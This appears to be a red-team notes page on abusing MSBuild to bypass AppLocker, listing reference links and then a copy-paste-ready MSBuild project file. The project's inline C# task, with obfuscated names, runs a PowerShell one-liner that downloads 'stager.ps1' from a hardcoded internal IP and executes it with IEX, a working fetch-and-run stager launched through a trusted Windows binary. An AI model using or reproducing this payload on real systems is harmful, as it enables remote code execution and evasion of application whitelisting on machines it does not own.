<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>MSBUILD</title>
</head><body>C:\Windows\Microsoft.NET\Framework\v4.0.30319&gt; msbuild.exe malware.xml<br/>
<br/>
https://github.com/giMini/PowerMemory/blob/master/RWMC/misc/reverseshell.xml<br/>
<br/>
<br/>
<a href="https://github.com/Cn33liz/MSBuildShell">https://github.com/Cn33liz/MSBuildShell</a> <br/>
<a href="https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/">https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/</a> <br/>
<a href="https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md">https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md</a>&nbsp; <br/>
<a href="https://oddvar.moe/2017/12/13/harden-windows-with-applocker-based-on-case-study-part-1/">https://oddvar.moe/2017/12/13/harden-windows-with-applocker-based-on-case-study-part-1/</a>&nbsp; <br/>
<br/>
##############################################################################<br/>
Do Not Edit Below this Line - copy, paste, make a new xml file<br/>
##############################################################################<br/>
<br/>
&lt;Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"&gt;<br/>
&nbsp; &lt;Target Name="34rfas"&gt;<br/>
&nbsp; &nbsp;&lt;QWEridxnaPO /&gt;<br/>
&nbsp; &lt;/Target&gt;<br/>
&#09;&lt;UsingTask<br/>
&nbsp; &nbsp; TaskName="QWEridxnaPO"<br/>
&nbsp; &nbsp; TaskFactory="CodeTaskFactory"<br/>
&nbsp; &nbsp; AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" &gt;<br/>
&#09;&lt;Task&gt;<br/>
&#09; &nbsp;&lt;Reference Include="System.Management.Automation" /&gt;<br/>
&nbsp; &nbsp; &nbsp; &lt;Code Type="Class" Language="cs"&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &lt;![CDATA[<br/>
&#09;&#09;&#09;using System;<br/>
&#09;&#09;&#09;using System.IO;<br/>
&#09;&#09;&#09;using System.Diagnostics;<br/>
&#09;&#09;&#09;using System.Reflection;<br/>
&#09;&#09;&#09;using System.Runtime.InteropServices;<br/>
&#09;&#09;&#09;using System.Collections.ObjectModel;<br/>
&#09;&#09;&#09;using System.Management.Automation;<br/>
&#09;&#09;&#09;using System.Management.Automation.Runspaces;<br/>
&#09;&#09;&#09;using System.Text;<br/>
&#09;&#09;&#09;using Microsoft.Build.Framework;<br/>
&#09;&#09;&#09;using Microsoft.Build.Utilities;<br/>
&#09;&#09;&#09;public class QWEridxnaPO : &nbsp;Task, ITask {<br/>
&#09;&#09;&#09;&#09;public override bool Execute() {<br/>
&#09;&#09;&#09;&#09;&#09;string pok = "$WC=NeW-ObJeCt SySteM.NeT.WEbClieNT; $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0 rv:11.0) like Gecko';$wc.HeAdErS.aDD('User-Agent',$u);$wC.pRoXy = [SYStem.NET.WEBREquest]::DefAulTwebProxy;$wc.prOxy.CrEdEntIALs = [sYsTeM.NeT.cReDeNtiaLCache]::DeFaultNETwoRKcReDentIals;$wc.dOwNloaDStriNG('http://192.168.0.15/stager.ps1') | IEX";<br/>
&#09;&#09;&#09;&#09;&#09;Runspace runspace = RunspaceFactory.CreateRunspace();<br/>
&#09;&#09;&#09;&#09;&#09;runspace.Open();<br/>
&#09;&#09;&#09;&#09;&#09;RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);<br/>
&#09;&#09;&#09;&#09;&#09;Pipeline pipeline = runspace.CreatePipeline();<br/>
&#09;&#09;&#09;&#09;&#09;pipeline.Commands.AddScript(pok);<br/>
&#09;&#09;&#09;&#09;&#09;pipeline.Invoke();<br/>
&#09;&#09;&#09;&#09;&#09;runspace.Close();<br/>
&#09;&#09;&#09;&#09;&#09;return true;<br/>
&#09;&#09;&#09;&#09;}<br/>
&#09;&#09;&#09;}<br/>
&nbsp; &nbsp; &nbsp; &nbsp; ]]&gt;<br/>
&nbsp; &nbsp; &nbsp; &lt;/Code&gt;<br/>
&nbsp; &nbsp; &lt;/Task&gt;<br/>
&nbsp; &lt;/UsingTask&gt;<br/>
&lt;/Project&gt;</body></html>